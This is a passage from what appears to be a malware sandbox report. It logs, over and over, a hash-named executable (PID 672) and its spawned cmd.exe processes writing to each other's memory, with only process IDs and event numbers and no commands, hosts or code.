cmd.exe 369 PID 980 wrote to memory of 1948 980 cmd.exe 370 PID 980 wrote to memory of 1948 980 cmd.exe 370 PID 980 wrote to memory of 1948 980 cmd.exe 370 PID 980 wrote to memory of 1948 980 cmd.exe 370 PID 980 wrote to memory of 1896 980 cmd.exe 371 PID 980 wrote to memory of 1896 980 cmd.exe 371 PID 980 wrote to memory of 1896 980 cmd.exe 371 PID 980 wrote to memory of 1896 980 cmd.exe 371 PID 1896 wrote to memory of 224 1896 cmd.exe 372 PID 1896 wrote to memory of 224 1896 cmd.exe 372 PID 1896 wrote to memory of 224 1896 cmd.exe 372 PID 1896 wrote to memory of 224 1896 cmd.exe 372 PID 980 wrote to memory of 904 980 cmd.exe 373 PID 980 wrote to memory of 904 980 cmd.exe 373 PID 980 wrote to memory of 904 980 cmd.exe 373 PID 980 wrote to memory of 904 980 cmd.exe 373 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 374 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 374 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 374 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 374 PID 1752 wrote to memory of 1520 1752 cmd.exe 376 PID 1752 wrote to memory of 1520 1752 cmd.exe 376 PID 1752 wrote to memory of 1520 1752 cmd.exe 376 PID 1752 wrote to memory of 1520 1752 cmd.exe 376 PID 1752 wrote to memory of 1848 1752 cmd.exe 377 PID 1752 wrote to memory of 1848 1752 cmd.exe 377 PID 1752 wrote to memory of 1848 1752 cmd.exe 377 PID 1752 wrote to memory of 1848 1752 cmd.exe 377 PID 1752 wrote to memory of 1920 1752 cmd.exe 378 PID 1752 wrote to memory of 1920 1752 cmd.exe 378 PID 1752 wrote to memory of 1920 1752 cmd.exe 378 PID 1752 wrote to memory of 1920 1752 cmd.exe 378 PID 1920 wrote to memory of 1820 1920 cmd.exe 379 PID 1920 wrote to memory of 1820 1920 cmd.exe 379 PID 1920 wrote to memory of 1820 1920 cmd.exe 379 PID 1920 wrote to memory of 1820 1920 cmd.exe 379 PID 1752 wrote to memory of 212 1752 cmd.exe 380 PID 1752 wrote to memory of 212 1752 cmd.exe 380 PID 1752 wrote to memory of 212 1752 cmd.exe 380 PID 1752 wrote to memory of 212 1752 cmd.exe 380 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 381 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 381 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 381 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 381 PID 744 wrote to memory of 216 744 cmd.exe 383 PID 744 wrote to memory of 216 744 cmd.exe 383 PID 744 wrote to memory of 216 744 cmd.exe 383 PID 744 wrote to memory of 216 744 cmd.exe 383 PID 744 wrote to memory of 364 744 cmd.exe 384 PID 744 wrote to memory of 364 744 cmd.exe 384 PID 744 wrote to memory of 364 744 cmd.exe 384 PID 744 wrote to memory of 364 744 cmd.exe 384 PID 744 wrote to memory of 1512 744 cmd.exe 385 PID 744 wrote to memory of 1512 744 cmd.exe 385 PID 744 wrote to memory of 1512 744 cmd.exe 385 PID 744 wrote to memory of 1512 744 cmd.exe 385 PID 1512 wrote to memory of 992 1512 cmd.exe 386 PID 1512 wrote to memory of 992 1512 cmd.exe 386 PID 1512 wrote to memory of 992 1512 cmd.exe 386 PID 1512 wrote to memory of 992 1512 cmd.exe 386 PID 744 wrote to memory of 952 744 cmd.exe 387 PID 744 wrote to memory of 952 744 cmd.exe 387 PID 744 wrote to memory of 952 744 cmd.exe 387 PID 744 wrote to memory of 952 744 cmd.exe 387 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 388 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 388 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 388 PID 672 wrote to memory of 864 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 388 PID 864 wrote to memory of 224 864 cmd.exe 390 PID 864 wrote to memory of 224 864 cmd.exe 390 PID 864 wrote to memory of 224 864 cmd.exe 390 PID 864 wrote to memory of 224 864 cmd.exe 390 PID 864 wrote to memory of 1240 864 cmd.exe 391 PID 864 wrote to memory of 1240 864 cmd.exe 391 PID 864 wrote to memory of 1240 864 cmd.exe 391 PID 864 wrote to memory of 1240 864 cmd.exe 391 PID 864 wrote to memory of 904 864 cmd.exe 392 PID 864 wrote to memory of 904 864 cmd.exe 392 PID 864 wrote to memory of 904 864 cmd.exe 392 PID 864 wrote to memory of 904 864 cmd.exe 392 PID 904 wrote to memory of 980 904 cmd.exe 393 PID 904 wrote to memory of 980 904 cmd.exe 393 PID 904 wrote to memory of 980 904 cmd.exe 393 PID 904 wrote to memory of 980 904 cmd.exe 393 PID 864 wrote to memory of 1156 864 cmd.exe 394 PID 864 wrote to memory of 1156 864 cmd.exe 394 PID 864 wrote to memory of 1156 864 cmd.exe 394 PID 864 wrote to memory of 1156 864 cmd.exe 394 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 395 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 395 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 395 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 395 PID 1968 wrote to memory of 1820 1968 cmd.exe 397 PID 1968 wrote to memory of 1820 1968 cmd.exe 397 PID 1968 wrote to memory of 1820 1968 cmd.exe 397 PID 1968 wrote to memory of 1820 1968 cmd.exe 397 PID 1968 wrote to memory of 544 1968 cmd.exe 398 PID 1968 wrote to memory of 544 1968 cmd.exe 398 PID 1968 wrote to memory of 544 1968 cmd.exe 398 PID 1968 wrote to memory of 544 1968 cmd.exe 398 PID 1968 wrote to memory of 212 1968 cmd.exe 399 PID 1968 wrote to memory of 212 1968 cmd.exe 399 PID 1968 wrote to memory of 212 1968 cmd.exe 399 PID 1968 wrote to memory of 212 1968 cmd.exe 399 PID 212 wrote to memory of 360 212 cmd.exe 400 PID 212 wrote to memory of 360 212 cmd.exe 400 PID 212 wrote to memory of 360 212 cmd.exe 400 PID 212 wrote to memory of 360 212 cmd.exe 400 PID 1968 wrote to memory of 1384 1968 cmd.exe 401 PID 1968 wrote to memory of 1384 1968 cmd.exe 401 PID 1968 wrote to memory of 1384 1968 cmd.exe 401 PID 1968 wrote to memory of 1384 1968 cmd.exe 401 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 402 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 402 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 402 PID 672 wrote to memory of 1496 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 402 PID 1496 wrote to memory of 992 1496 cmd.exe 404 PID 1496 wrote to memory of 992 1496 cmd.exe 404 PID 1496 wrote to memory of 992 1496 cmd.exe 404 PID 1496 wrote to memory of 992 1496 cmd.exe 404 PID 1496 wrote to memory of 964 1496 cmd.exe 405 PID 1496 wrote to memory of 964 1496 cmd.exe 405 PID 1496 wrote to memory of 964 1496 cmd.exe 405 PID 1496 wrote to memory of 964 1496 cmd.exe 405 PID 1496 wrote to memory of 1956 1496 cmd.exe 406 PID 1496 wrote to memory of 1956 1496 cmd.exe 406 PID 1496 wrote to memory of 1956 1496 cmd.exe 406 PID 1496 wrote to memory of 1956 1496 cmd.exe 406 PID 1956 wrote to memory of 756 1956 cmd.exe 407 PID 1956 wrote to memory of 756 1956 cmd.exe 407 PID 1956 wrote to memory of 756 1956 cmd.exe 407 PID 1956 wrote to memory of 756 1956 cmd.exe 407 PID 1496 wrote to memory of 236 1496 cmd.exe 408 PID 1496 wrote to memory of 236 1496 cmd.exe 408 PID 1496 wrote to memory of 236 1496 cmd.exe 408 PID 1496 wrote to memory of 236 1496 cmd.exe 408 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 409 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 409 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 409 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 409 PID 1240 wrote to memory of 980 1240 cmd.exe 411 PID 1240 wrote to memory of 980 1240 cmd.exe 411 PID 1240 wrote to memory of 980 1240 cmd.exe 411 PID 1240 wrote to memory of 980 1240 cmd.exe 411 PID 1240 wrote to memory of 1068 1240 cmd.exe 412 PID 1240 wrote to memory of 1068 1240 cmd.exe 412 PID 1240 wrote to memory of 1068 1240 cmd.exe 412 PID 1240 wrote to memory of 1068 1240 cmd.exe 412 PID 1240 wrote to memory of 700 1240 cmd.exe 413 PID 1240 wrote to memory of 700 1240 cmd.exe 413 PID 1240 wrote to memory of 700 1240 cmd.exe 413 PID 1240 wrote to memory of 700 1240 cmd.exe 413 PID 700 wrote to memory of 864 700 cmd.exe 414 PID 700 wrote to memory of 864 700 cmd.exe 414 PID 700 wrote to memory of 864 700 cmd.exe 414 PID 700 wrote to memory of 864 700 cmd.exe 414 PID 1240 wrote to memory of 1736 1240 cmd.exe 415 PID 1240 wrote to memory of 1736 1240 cmd.exe 415 PID 1240 wrote to memory of 1736 1240 cmd.exe 415 PID 1240 wrote to memory of 1736 1240 cmd.exe 415 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 416 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 416 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 416 PID 672 wrote to memory of 544 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 416 PID 544 wrote to memory of 1828 544 cmd.exe 418 PID 544 wrote to memory of 1828 544 cmd.exe 418 PID 544 wrote to memory of 1828 544 cmd.exe 418 PID 544 wrote to memory of 1828 544 cmd.exe 418 PID 544 wrote to memory of 2044 544 cmd.exe 419 PID 544 wrote to memory of 2044 544 cmd.exe 419 PID 544 wrote to memory of 2044 544 cmd.exe 419 PID 544 wrote to memory of 2044 544 cmd.exe 419 PID 544 wrote to memory of 1848 544 cmd.exe 420 PID 544 wrote to memory of 1848 544 cmd.exe 420 PID 544 wrote to memory of 1848 544 cmd.exe 420 PID 544 wrote to memory of 1848 544 cmd.exe 420 PID 1848 wrote to memory of 1368 1848 cmd.exe 421 PID 1848 wrote to memory of 1368 1848 cmd.exe 421 PID 1848 wrote to memory of 1368 1848 cmd.exe 421 PID 1848 wrote to memory of 1368 1848 cmd.exe 421 PID 544 wrote to memory of 220 544 cmd.exe 422 PID 544 wrote to memory of 220 544 cmd.exe 422 PID 544 wrote to memory of 220 544 cmd.exe 422 PID 544 wrote to memory of 220 544 cmd.exe 422 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 423 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 423 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 423 PID 672 wrote to memory of 964 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 423 PID 964 wrote to memory of 744 964 cmd.exe 425 PID 964 wrote to memory of 744 964 cmd.exe 425 PID 964 wrote to memory of 744 964 cmd.exe 425 PID 964 wrote to memory of 744 964 cmd.exe 425 PID 964 wrote to memory of 1680 964 cmd.exe 426 PID 964 wrote to memory of 1680 964 cmd.exe 426 PID 964 wrote to memory of 1680 964 cmd.exe 426 PID 964 wrote to memory of 1680 964 cmd.exe 426 PID 964 wrote to memory of 364 964 cmd.exe 427 PID 964 wrote to memory of 364 964 cmd.exe 427 PID 964 wrote to memory of 364 964 cmd.exe 427 PID 964 wrote to memory of 364 964 cmd.exe 427 PID 364 wrote to memory of 592 364 cmd.exe 428 PID 364 wrote to memory of 592 364 cmd.exe 428 PID 364 wrote to memory of 592 364 cmd.exe 428 PID 364 wrote to memory of 592 364 cmd.exe 428 PID 964 wrote to memory of 904 964 cmd.exe 429 PID 964 wrote to memory of 904 964 cmd.exe 429 PID 964 wrote to memory of 904 964 cmd.exe 429 PID 964 wrote to memory of 904 964 cmd.exe 429 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 430 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 430 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 430 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 430 PID 1156 wrote to memory of 1836 1156 cmd.exe 432 PID 1156 wrote to memory of 1836 1156 cmd.exe 432 PID 1156 wrote to memory of 1836 1156 cmd.exe 432 PID 1156 wrote to memory of 1836 1156 cmd.exe 432 PID 1156 wrote to memory of 760 1156 cmd.exe 433 PID 1156 wrote to memory of 760 1156 cmd.exe 433 PID 1156 wrote to memory of 760 1156 cmd.exe 433 PID 1156 wrote to memory of 760 1156 cmd.exe 433 PID 1156 wrote to memory of 652 1156 cmd.exe 434 PID 1156 wrote to memory of 652 1156 cmd.exe 434 PID 1156 wrote to memory of 652 1156 cmd.exe 434 PID 1156 wrote to memory of 652 1156 cmd.exe 434 PID 652 wrote to memory of 204 652 cmd.exe 435 PID 652 wrote to memory of 204 652 cmd.exe 435 PID 652 wrote to memory of 204 652 cmd.exe 435 PID 652 wrote to memory of 204 652 cmd.exe 435 PID 1156 wrote to memory of 216 1156 cmd.exe 436 PID 1156 wrote to memory of 216 1156 cmd.exe 436 PID 1156 wrote to memory of 216 1156 cmd.exe 436 PID 1156 wrote to memory of 216 1156 cmd.exe 436 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 437 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 437 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 437 PID 672 wrote to memory of 1372 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 437 PID 1372 wrote to memory of 896 1372 cmd.exe 439 PID 1372 wrote to memory of 896 1372 cmd.exe 439 PID 1372 wrote to memory of 896 1372 cmd.exe 439 PID 1372 wrote to memory of 896 1372 cmd.exe 439 PID 1372 wrote to memory of 952 1372 cmd.exe 440 PID 1372 wrote to memory of 952 1372 cmd.exe 440 PID 1372 wrote to memory of 952 1372 cmd.exe 440 PID 1372 wrote to memory of 952 1372 cmd.exe 440 PID 1372 wrote to memory of 220 1372 cmd.exe 441 PID 1372 wrote to memory of 220 1372 cmd.exe 441 PID 1372 wrote to memory of 220 1372 cmd.exe 441 PID 1372 wrote to memory of 220 1372 cmd.exe 441 PID 220 wrote to memory of 1468 220 cmd.exe 442 PID 220 wrote to memory of 1468 220 cmd.exe 442 PID 220 wrote to memory of 1468 220 cmd.exe 442 PID 220 wrote to memory of 1468 220 cmd.exe 442 PID 1372 wrote to memory of 224 1372 cmd.exe 443 PID 1372 wrote to memory of 224 1372 cmd.exe 443 PID 1372 wrote to memory of 224 1372 cmd.exe 443 PID 1372 wrote to memory of 224 1372 cmd.exe 443 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 444 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 444 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 444 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 444 PID 1812 wrote to memory of 1080 1812 cmd.exe 446 PID 1812 wrote to memory of 1080 1812 cmd.exe 446 PID 1812 wrote to memory of 1080 1812 cmd.exe 446 PID 1812 wrote to memory of 1080 1812 cmd.exe 446 PID 1812 wrote to memory of 980 1812 cmd.exe 447 PID 1812 wrote to memory of 980 1812 cmd.exe 447 PID 1812 wrote to memory of 980 1812 cmd.exe 447 PID 1812 wrote to memory of 980 1812 cmd.exe 447 PID 1812 wrote to memory of 1520 1812 cmd.exe 448 PID 1812 wrote to memory of 1520 1812 cmd.exe 448 PID 1812 wrote to memory of 1520 1812 cmd.exe 448 PID 1812 wrote to memory of 1520 1812 cmd.exe 448 PID 1520 wrote to memory of 756 1520 cmd.exe 449 PID 1520 wrote to memory of 756 1520 cmd.exe 449 PID 1520 wrote to memory of 756 1520 cmd.exe 449 PID 1520 wrote to memory of 756 1520 cmd.exe 449 PID 1812 wrote to memory of 524 1812 cmd.exe 450 PID 1812 wrote to memory of 524 1812 cmd.exe 450 PID 1812 wrote to memory of 524 1812 cmd.exe 450 PID 1812 wrote to memory of 524 1812 cmd.exe 450 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 451 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 451 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 451 PID 672 wrote to memory of 1552 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 451 PID 1552 wrote to memory of 1052 1552 cmd.exe 453 PID 1552 wrote to memory of 1052 1552 cmd.exe 453 PID 1552 wrote to memory of 1052 1552 cmd.exe 453 PID 1552 wrote to memory of 1052 1552 cmd.exe 453 PID 1552 wrote to memory of 652 1552 cmd.exe 454 PID 1552 wrote to memory of 652 1552 cmd.exe 454 PID 1552 wrote to memory of 652 1552 cmd.exe 454 PID 1552 wrote to memory of 652 1552 cmd.exe 454 PID 1552 wrote to memory of 1384 1552 cmd.exe 455 PID 1552 wrote to memory of 1384 1552 cmd.exe 455 PID 1552 wrote to memory of 1384 1552 cmd.exe 455 PID 1552 wrote to memory of 1384 1552 cmd.exe 455 PID 1384 wrote to memory of 1920 1384 cmd.exe 456 PID 1384 wrote to memory of 1920 1384 cmd.exe 456 PID 1384 wrote to memory of 1920 1384 cmd.exe 456 PID 1384 wrote to memory of 1920 1384 cmd.exe 456 PID 1552 wrote to memory of 1512 1552 cmd.exe 457 PID 1552 wrote to memory of 1512 1552 cmd.exe 457 PID 1552 wrote to memory of 1512 1552 cmd.exe 457 PID 1552 wrote to memory of 1512 1552 cmd.exe 457 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 458 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 458 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 458 PID 672 wrote to memory of 1488 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 458 PID 1488 wrote to memory of 1896 1488 cmd.exe 460 PID 1488 wrote to memory of 1896 1488 cmd.exe 460 PID 1488 wrote to memory of 1896 1488 cmd.exe 460 PID 1488 wrote to memory of 1896 1488 cmd.exe 460 PID 1488 wrote to memory of 220 1488 cmd.exe 461 PID 1488 wrote to memory of 220 1488 cmd.exe 461 PID 1488 wrote to memory of 220 1488 cmd.exe 461 PID 1488 wrote to memory of 220 1488 cmd.exe 461 PID 1488 wrote to memory of 236 1488 cmd.exe 462 PID 1488 wrote to memory of 236 1488 cmd.exe 462 PID 1488 wrote to memory of 236 1488 cmd.exe 462 PID 1488 wrote to memory of 236 1488 cmd.exe 462 PID 236 wrote to memory of 1840 236 cmd.exe 463 PID 236 wrote to memory of 1840 236 cmd.exe 463 PID 236 wrote to memory of 1840 236 cmd.exe 463 PID 236 wrote to memory of 1840 236 cmd.exe 463 PID 1488 wrote to memory of 1680 1488 cmd.exe 464 PID 1488 wrote to memory of 1680 1488 cmd.exe 464 PID 1488 wrote to memory of 1680 1488 cmd.exe 464 PID 1488 wrote to memory of 1680 1488 cmd.exe 464 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 465 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 465 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 465 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 465 PID 1080 wrote to memory of 1576 1080 cmd.exe 467 PID 1080 wrote to memory of 1576 1080 cmd.exe 467 PID 1080 wrote to memory of 1576 1080 cmd.exe 467 PID 1080 wrote to memory of 1576 1080 cmd.exe 467 PID 1080 wrote to memory of 1068 1080 cmd.exe 468 PID 1080 wrote to memory of 1068 1080 cmd.exe 468 PID 1080 wrote to memory of 1068 1080 cmd.exe 468 PID 1080 wrote to memory of 1068 1080 cmd.exe 468 PID 1080 wrote to memory of 1836 1080 cmd.exe 469 PID 1080 wrote to memory of 1836 1080 cmd.exe 469 PID 1080 wrote to memory of 1836 1080 cmd.exe 469 PID 1080 wrote to memory of 1836 1080 cmd.exe 469 PID 1836 wrote to memory of 232 1836 cmd.exe 470 PID 1836 wrote to memory of 232 1836 cmd.exe 470 PID 1836 wrote to memory of 232 1836 cmd.exe 470 PID 1836 wrote to memory of 232 1836 cmd.exe 470 PID 1080 wrote to memory of 1820 1080 cmd.exe 471 PID 1080 wrote to memory of 1820 1080 cmd.exe 471 PID 1080 wrote to memory of 1820 1080 cmd.exe 471 PID 1080 wrote to memory of 1820 1080 cmd.exe 471 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 472 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 472 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 472 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 472 PID 1052 wrote to memory of 2044 1052 cmd.exe 474 PID 1052 wrote to memory of 2044 1052 cmd.exe 474 PID 1052 wrote to memory of 2044 1052 cmd.exe 474 PID 1052 wrote to memory of 2044 1052 cmd.exe 474 PID 1052 wrote to memory of 1384 1052 cmd.exe 475 PID 1052 wrote to memory of 1384 1052 cmd.exe 475 PID 1052 wrote to memory of 1384 1052 cmd.exe 475 PID 1052 wrote to memory of 1384 1052 cmd.exe 475 PID 1052 wrote to memory of 896 1052 cmd.exe 476 PID 1052 wrote to memory of 896 1052 cmd.exe 476 PID 1052 wrote to memory of 896 1052 cmd.exe 476 PID 1052 wrote to memory of 896 1052 cmd.exe 476 PID 896 wrote to memory of 1752 896 cmd.exe 477 PID 896 wrote to memory of 1752 896 cmd.exe 477 PID 896 wrote to memory of 1752 896 cmd.exe 477 PID 896 wrote to memory of 1752 896 cmd.exe 477 PID 1052 wrote to memory of 1960 1052 cmd.exe 478 PID 1052 wrote to memory of 1960 1052 cmd.exe 478 PID 1052 wrote to memory of 1960 1052 cmd.exe 478 PID 1052 wrote to memory of 1960 1052 cmd.exe 478 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 479 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 479 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 479 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 479 PID 1896 wrote to memory of 280 1896 cmd.exe 481 PID 1896 wrote to memory of 280 1896 cmd.exe 481 PID 1896 wrote to memory of 280 1896 cmd.exe 481 PID 1896 wrote to memory of 280 1896 cmd.exe 481 PID 1896 wrote to memory of 236 1896 cmd.exe 482 PID 1896 wrote to memory of 236 1896 cmd.exe 482 PID 1896 wrote to memory of 236 1896 cmd.exe 482 PID 1896 wrote to memory of 236 1896 cmd.exe 482 PID 1896 wrote to memory of 592 1896 cmd.exe 483 PID 1896 wrote to memory of 592 1896 cmd.exe 483 PID 1896 wrote to memory of 592 1896 cmd.exe 483 PID 1896 wrote to memory of 592 1896 cmd.exe 483 PID 592 wrote to memory of 544 592 cmd.exe 484 PID 592 wrote to memory of 544 592 cmd.exe 484 PID 592 wrote to memory of 544 592 cmd.exe 484 PID 592 wrote to memory of 544 592 cmd.exe 484 PID 1896 wrote to memory of 568 1896 cmd.exe 485 PID 1896 wrote to memory of 568 1896 cmd.exe 485 PID 1896 wrote to memory of 568 1896 cmd.exe 485 PID 1896 wrote to memory of 568 1896 cmd.exe 485 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 486 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 486 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 486 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 486 PID 1576 wrote to memory of 676 1576 cmd.exe 488 PID 1576 wrote to memory of 676 1576 cmd.exe 488 PID 1576 wrote to memory of 676 1576 cmd.exe 488 PID 1576 wrote to memory of 676 1576 cmd.exe 488 PID 1576 wrote to memory of 1836 1576 cmd.exe 489 PID 1576 wrote to memory of 1836 1576 cmd.exe 489 PID 1576 wrote to memory of 1836 1576 cmd.exe 489 PID 1576 wrote to memory of 1836 1576 cmd.exe 489 PID 1576 wrote to memory of 1652 1576 cmd.exe 490 PID 1576 wrote to memory of 1652 1576 cmd.exe 490 PID 1576 wrote to memory of 1652 1576 cmd.exe 490 PID 1576 wrote to memory of 1652 1576 cmd.exe 490 PID 1652 wrote to memory of 964 1652 cmd.exe 491 PID 1652 wrote to memory of 964 1652 cmd.exe 491 PID 1652 wrote to memory of 964 1652 cmd.exe 491 PID 1652 wrote to memory of 964 1652 cmd.exe 491 PID 1576 wrote to memory of 212 1576 cmd.exe 492 PID 1576 wrote to memory of 212 1576 cmd.exe 492 PID 1576 wrote to memory of 212 1576 cmd.exe 492 PID 1576 wrote to memory of 212 1576 cmd.exe 492 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 493 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 493 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 493 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 493 PID 2044 wrote to memory of 760 2044 cmd.exe 495 PID 2044 wrote to memory of 760 2044 cmd.exe 495 PID 2044 wrote to memory of 760 2044 cmd.exe 495 PID 2044 wrote to memory of 760 2044 cmd.exe 495 PID 2044 wrote to memory of 896 2044 cmd.exe 496 PID 2044 wrote to memory of 896 2044 cmd.exe 496 PID 2044 wrote to memory of 896 2044 cmd.exe 496 PID 2044 wrote to memory of 896 2044 cmd.exe 496 PID 2044 wrote to memory of 228 2044 cmd.exe 497 PID 2044 wrote to memory of 228 2044 cmd.exe 497 PID 2044 wrote to memory of 228 2044 cmd.exe 497 PID 2044 wrote to memory of 228 2044 cmd.exe 497 PID 228 wrote to memory of 1156 228 cmd.exe 498 PID 228 wrote to memory of 1156 228 cmd.exe 498 PID 228 wrote to memory of 1156 228 cmd.exe 498 PID 228 wrote to memory of 1156 228 cmd.exe 498 PID 2044 wrote to memory of 1956 2044 cmd.exe 499 PID 2044 wrote to memory of 1956 2044 cmd.exe 499 PID 2044 wrote to memory of 1956 2044 cmd.exe 499 PID 2044 wrote to memory of 1956 2044 cmd.exe 499 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 500 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 500 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 500 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 500 PID 280 wrote to memory of 952 280 cmd.exe 502 PID 280 wrote to memory of 952 280 cmd.exe 502 PID 280 wrote to memory of 952 280 cmd.exe 502 PID 280 wrote to memory of 952 280 cmd.exe 502 PID 280 wrote to memory of 592 280 cmd.exe 503 PID 280 wrote to memory of 592 280 cmd.exe 503 PID 280 wrote to memory of 592 280 cmd.exe 503 PID 280 wrote to memory of 592 280 cmd.exe 503 PID 280 